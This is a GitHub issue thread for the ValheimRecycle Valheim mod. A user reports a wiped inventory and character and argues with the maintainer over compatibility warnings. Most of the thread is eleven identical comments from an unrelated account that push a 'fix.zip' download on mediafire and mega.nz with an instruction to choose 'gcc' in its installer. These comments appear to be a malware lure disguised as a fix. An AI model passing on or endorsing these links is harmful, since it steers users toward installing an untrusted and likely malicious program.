### ISSUE TITLE
mod hosed my inventory

### ISSUE THREAD

**Issue by BETLOG** [Ivaylo-Lafchiev/ValheimRecycle#21]
*cough*
FYI:
I looked for the crucial info: is it client side, or do i need it on the server too... nothing.

So I dropped it into my client berpinex/plugins, cranked the game, and joined my LAN dedicated.
Suddenly I'm waking from being asleep (I wasnt), I have Hugin inside my avatars head and everything is spinning due to the this-isnt-meant-to-happen part, and my inv is totally empty.

[edit] Map seems ok, but my character is entirely hosed, level 0, no inv.
yeah great.

So is it because this mod needs a server-side plugin? Or is this SNAFU an incompatibility with my existing plugins?

Plugins I have active on client and server:

```
Jotunn
MMHOOK
PlanBuild
Build Camera.dll
ComfyGizmo.dll
ComfyQuickSlots.dll
HitboxFix.dll
Valheim.DisplayBepInExInfo.dll
```

**Comment by Ivaylo-Lafchiev** [comment]
As the mod page states, compatibility with other mods has not been tested; this is likely what caused your issue.

**Comment by BETLOG** [comment]
Then your mod is defective and you need to add stronger warnings to back up the users character.
Your existing warnings just sound like standard simpy caveat-emptor, when in fact you *know* that anyone with any of the most popular building tool mods will have a serious problem with your mod.
It's extremely irresponsible, and lazy.

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
